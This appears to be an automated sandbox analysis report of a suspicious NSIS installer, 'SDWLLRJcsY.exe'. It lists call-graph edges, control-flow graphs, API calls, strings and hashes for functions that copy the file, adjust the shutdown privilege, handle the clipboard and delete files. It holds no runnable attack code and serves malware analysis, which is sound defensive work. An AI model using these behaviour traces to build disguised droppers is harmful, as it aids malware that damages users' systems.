3911->3906 3911->3908 3911->3910 3912 405831 2 API calls 3911->3912 3913 4037c3 CloseHandle 3911->3913 3912->3911 3913->3911 3914->3838 3915->3840 3917 4064e0 5 API calls 3916->3917 3919 403318 3917->3919 3918 403322 3918->3846 3919->3918 3920 405b1d 3 API calls 3919->3920 3921 40332a 3920->3921 3922 4057fc 2 API calls 3921->3922 3923 403330 3922->3923 3924 405d6d 2 API calls 3923->3924 3925 40333b 3924->3925 3925->3846 4022 405d3e GetFileAttributesW CreateFileW 3926->4022 3928 402f01 3929 402f11 3928->3929 4023 40624c lstrcpynW 3928->4023 3929->3853 3931 402f27 3932 405b69 2 API calls 3931->3932 3933 402f2d 3932->3933 4024 40624c lstrcpynW 3933->4024 3935 402f38 GetFileSize 3950 403034 3935->3950 3953 402f4f 3935->3953 3937 40303d 3937->3929 3939 40306d GlobalAlloc 3937->3939 4037 4032f5 SetFilePointer 3937->4037 3938 4032df ReadFile 3938->3953 4036 4032f5 SetFilePointer 3939->4036 3940 4030a0 3944 402e5d 6 API calls 3940->3944 3943 403088 3946 4030fa 35 API calls 3943->3946 3944->3929 3945 403056 3947 4032df ReadFile 3945->3947 3951 403094 3946->3951 3949 403061 3947->3949 3948 402e5d 6 API calls 3948->3953 3949->3929 3949->3939 4025 402e5d 3950->4025 3951->3929 3951->3951 3952 4030d1 SetFilePointer 3951->3952 3952->3929 3953->3929 3953->3938 3953->3940 3953->3948 3953->3950 3955 406626 5 API calls 3954->3955 3956 40396e 3955->3956 3957 403974 3956->3957 3958 403986 3956->3958 4046 406193 wsprintfW 3957->4046 3959 40611a 3 API calls 3958->3959 3960 4039b6 3959->3960 3962 4039d5 lstrcatW 3960->3962 3964 40611a 3 API calls 3960->3964 3963 403984 3962->3963 4038 403c30 3963->4038 3964->3962 3967 405c25 18 API calls 3970 403a07 3967->3970 3968 403a9b 3969 405c25 18 API calls 3968->3969 3971 403aa1 3969->3971 3970->3968 3972 40611a 3 API calls 3970->3972 3974 403ab1 LoadImageW 3971->3974 3975 40626e 17 API calls 3971->3975 3973 403a39 3972->3973 3973->3968 3978 403a5a lstrlenW 3973->3978 3981 405b4a CharNextW 3973->3981 3976 403b57 3974->3976 3977 403ad8 RegisterClassW 3974->3977 3975->3974 3980 40140b 2 API calls 3976->3980 3979 403b0e SystemParametersInfoW CreateWindowExW 3977->3979 4009 403b61 3977->4009 3982 403a68 lstrcmpiW 3978->3982 3983 403a8e 3978->3983 3979->3976 3984 403b5d 3980->3984 3985 403a57 3981->3985 3982->3983 3986 403a78 GetFileAttributesW 3982->3986 3987 405b1d 3 API calls 3983->3987 3989 403c30 18 API calls 3984->3989 3984->4009 3985->3978 3988 403a84 3986->3988 3990 403a94 3987->3990 3988->3983 3991 405b69 2 API calls 3988->3991 3992 403b6e 3989->3992 4047 40624c lstrcpynW 3990->4047 3991->3983 3994 403b7a ShowWindow 3992->3994 3995 403bfd 3992->3995 3997 4065b6 3 API calls 3994->3997 3996 405383 5 API calls 3995->3996 3999 403c03 3996->3999 3998 403b92 3997->3998 4000 403ba0 GetClassInfoW 3998->4000 4003 4065b6 3 API calls 3998->4003 4001 403c07 3999->4001 4002 403c1f 3999->4002 4005 403bb4 GetClassInfoW RegisterClassW 4000->4005 4006 403bca DialogBoxParamW 4000->4006 4008 40140b 2 API calls 4001->4008 4001->4009 4004 40140b 2 API calls 4002->4004 4003->4000 4004->4009 4005->4006 4007 40140b 2 API calls 4006->4007 4007->4009 4008->4009 4009->3909 4010->3859 4011->3890 4012->3898 4014 403898 4013->4014 4015 40388a CloseHandle 4013->4015 4049 4038c5 4014->4049 4015->4014 4018 40595a 67 API calls 4019 4036b3 OleUninitialize 4018->4019 4019->3866 4019->3867 4020->3899 4021->3911 4022->3928 4023->3931 4024->3935 4026 402e66 4025->4026 4027 402e7e 4025->4027 4028 402e76 4026->4028 4029 402e6f DestroyWindow 4026->4029 4030 402e86 4027->4030 4031 402e8e GetTickCount 4027->4031 4028->3937 4029->4028 4032 406662 2 API calls 4030->4032 4033 402e9c CreateDialogParamW ShowWindow 4031->4033 4034 402ebf 4031->4034 4035 402e8c 4032->4035 4033->4034 4034->3937 4035->3937 4036->3943 4037->3945 4039 403c44 4038->4039 4048 406193 wsprintfW 4039->4048 4041 403cb5 4042 403ce9 18 API calls 4041->4042 4044 403cba 4042->4044 4043 4039e5 4043->3967 4044->4043 4045 40626e 17 API calls 4044->4045 4045->4044 4046->3963 4047->3968 4048->4041 4050 4038d3 4049->4050 4051 40389d 4050->4051 4052 4038d8 FreeLibrary GlobalFree 4050->4052 4051->4018 4052->4051 4052->4052

                                      Executed Functions

                                      Function 0040333D Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 8 403386 1->8 3 403392-4033a6 call 4065b6 lstrlenA 2->3 9 4033a8-4033c4 call 406626 * 3 3->9 8->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 22 4033ce 17->22 22->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be call 403880 OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 43 4034a5-4034de 38->43 44 40348c-403494 38->44 55 40354c-40354d 39->55 56 40354e-403554 39->56 47 4034e0-4034e5 43->47 48 4034fb-403535 43->48 45 403496-403499 44->45 46 40349b 44->46 45->43 45->46 46->43 47->48 52 4034e7-4034ef 47->52 48->39 53 403537-40353b 48->53 60 4034f1-4034f4 52->60 61 4034f6 52->61 53->39 62 40355c-40356a call 40624c 53->62 54->36 54->58 55->56 56->28 64 40355a 56->64 65 40369e-4036a5 call 40395a 57->65 66 40360f-40361a call 405b4a 57->66 75 4037e4-4037ea 58->75 76 4036c4-4036d4 call 4058ae ExitProcess 58->76 60->48 60->61 61->48 72 40356f 62->72 64->72 74 4036aa 65->74 77 403668-403672 66->77 78 40361c-403651 66->78 72->29 74->58 80 403868-403870 75->80 81 4037ec-403802 GetCurrentProcess OpenProcessToken 75->81 85 403674-403682 call 405c25 77->85 86 4036da-4036ee call 405819 lstrcatW 77->86 82 403653-403657 78->82 83 403872 80->83 84 403876-40387a ExitProcess 80->84 88 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403838-403846 call 406626 81->89 90 403660-403664 82->90 91 403659-40365e 82->91 83->84 85->58 101 403684-40369a call 40624c * 2 85->101 102 4036f0-4036f6 lstrcatW 86->102 103 4036fb-403715 lstrcatW lstrcmpiW 86->103 88->89 99 403854-40385f ExitWindowsEx 89->99 100 403848-403852 89->100 90->82 95 403666 90->95 91->90 91->95 95->77 99->80 104 403861-403863 call 40140b 99->104 100->99 100->104 101->65 102->103 103->58 106 403717-40371a 103->106 104->80 110 403723 call 4057fc 106->110 111 40371c-403721 call 40577f 106->111 116 403728-403736 SetCurrentDirectoryW 110->116 111->116 118 403743-40376c call 40624c 116->118 119 403738-40373e call 40624c 116->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->58 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                      APIs
                                      • SetErrorMode.KERNELBASE ref: 00403360
                                      • GetVersion.KERNEL32 ref: 00403366
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                      • OleInitialize.OLE32(00000000), ref: 004033DD
                                      • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                      • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448
                                        • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                        • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                        • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                      • ExitProcess.KERNEL32 ref: 004036D4
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                      • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\SDWLLRJcsY.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                      • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                      • ExitProcess.KERNEL32 ref: 0040387A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene$C:\Users\user\Desktop$C:\Users\user\Desktop\SDWLLRJcsY.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 2488574733-1526367878
                                      • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                      • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                      • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                      • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                      Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 162 4054f5-4054f8 140->162 163 4054d9-4054f3 SendMessageW * 2 140->163 143 4055a2-4055c4 GetDlgItem CreateThread CloseHandle 141->143 144 4055ca-4055d7 141->144 143->144 146 4055f5-4055ff 144->146 147 4055d9-4055df 144->147 151 405601-405607 146->151 152 405655-405659 146->152 149 4055e1-4055f0 ShowWindow * 2 call 404216 147->149 150 40561a-405623 call 404248 147->150 149->146 159 405628-40562c 150->159 156 405609-405615 call 4041ba 151->156 157 40562f-40563f ShowWindow 151->157 152->150 154 40565b-405661 152->154 154->150 164 405663-405676 SendMessageW 154->164 156->150 160 405641-40564a call 4052b0 157->160 161 40564f-405650 call 4041ba 157->161 160->161 161->152 168 405508-40551f call 4041e1 162->168 169 4054fa-405506 SendMessageW 162->169 163->162 170 405778-40577a 164->170 171 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 164->171 178 405521-405535 ShowWindow 168->178 179 405555-405576 GetDlgItem SendMessageW 168->179 169->168 170->159 176 4056a9-4056b9 GetWindowRect 171->176 177 4056bc-4056d1 TrackPopupMenu 171->177 176->177 177->170 181 4056d7-4056ee 177->181 182 405544 178->182 183 405537-405542 ShowWindow 178->183 179->170 180 40557c-405594 SendMessageW * 2 179->180 180->170 185 4056f3-40570e SendMessageW 181->185 184 40554a-405550 call 404216 182->184 183->184 184->179 185->185 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 185->186 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                      • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                      • GetClientRect.USER32(?,?), ref: 00405499
                                      • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                      • ShowWindow.USER32(?,00000008), ref: 0040553C
                                      • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                      • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                        • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                      • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                      • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                      • ShowWindow.USER32(00000000), ref: 004055E8
                                      • ShowWindow.USER32(?,00000008), ref: 004055ED
                                      • ShowWindow.USER32(00000008), ref: 00405637
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                      • CreatePopupMenu.USER32 ref: 0040567C
                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
                                      • GetWindowRect.USER32(?,?), ref: 004056B0
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                      • OpenClipboard.USER32(00000000), ref: 00405711
                                      • EmptyClipboard.USER32 ref: 00405717
                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                      • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                      • CloseClipboard.USER32 ref: 00405772
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: {$6B
                                      • API String ID: 590372296-3705917127
                                      • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                      • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                      • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                      • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                      Function 0040595A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 499 40595a-405980 call 405c25 502 405982-405994 DeleteFileW 499->502 503 405999-4059a0 499->503 504 405b16-405b1a 502->504 505 4059a2-4059a4 503->505 506 4059b3-4059c3 call 40624c 503->506 507 405ac4-405ac9 505->507 508 4059aa-4059ad 505->508 514 4059d2-4059d3 call 405b69 506->514 515 4059c5-4059d0 lstrcatW 506->515 507->504 510 405acb-405ace 507->510 508->506 508->507 512 405ad0-405ad6 510->512 513 405ad8-405ae0 call 40658f 510->513 512->504 513->504 523 405ae2-405af6 call 405b1d call 405912 513->523 516 4059d8-4059dc 514->516 515->516 519 4059e8-4059ee lstrcatW 516->519 520 4059de-4059e6 516->520 522 4059f3-405a0f lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a15-405a1d 522->524 525 405ab9-405abd 522->525 539 405af8-405afb 523->539 540 405b0e-405b11 call 4052b0 523->540 528 405a3d-405a51 call 40624c 524->528 529 405a1f-405a27 524->529 525->507 527 405abf 525->527 527->507 541 405a53-405a5b 528->541 542 405a68-405a73 call 405912 528->542 531 405a29-405a31 529->531 532 405a9c-405aac FindNextFileW 529->532 531->528 535 405a33-405a3b 531->535 532->524 538 405ab2-405ab3 FindClose 532->538 535->528 535->532 538->525 539->512 545 405afd-405b0c call 4052b0 call 406012 539->545 540->504 541->532 546 405a5d-405a66 call 40595a 541->546 551 405a94-405a97 call 4052b0 542->551 552 405a75-405a78 542->552 545->504 546->532 551->532 555 405a7a-405a8a call 4052b0 call 406012 552->555 556 405a8c-405a92 552->556 555->532 556->532
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405983
                                      • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059CB
                                      • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059EE
                                      • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059F4
                                      • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A04
                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                      • FindClose.KERNEL32(00000000), ref: 00405AB3
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                      • "C:\Users\user\Desktop\SDWLLRJcsY.exe", xrefs: 0040595A
                                      • \*.*, xrefs: 004059C5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                      • API String ID: 2035342205-839970050
                                      • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                      • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                      • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                      • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                      Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                      • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                      • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                      • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                      Function 0040658F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                      Download Yara Rule
                                      APIs
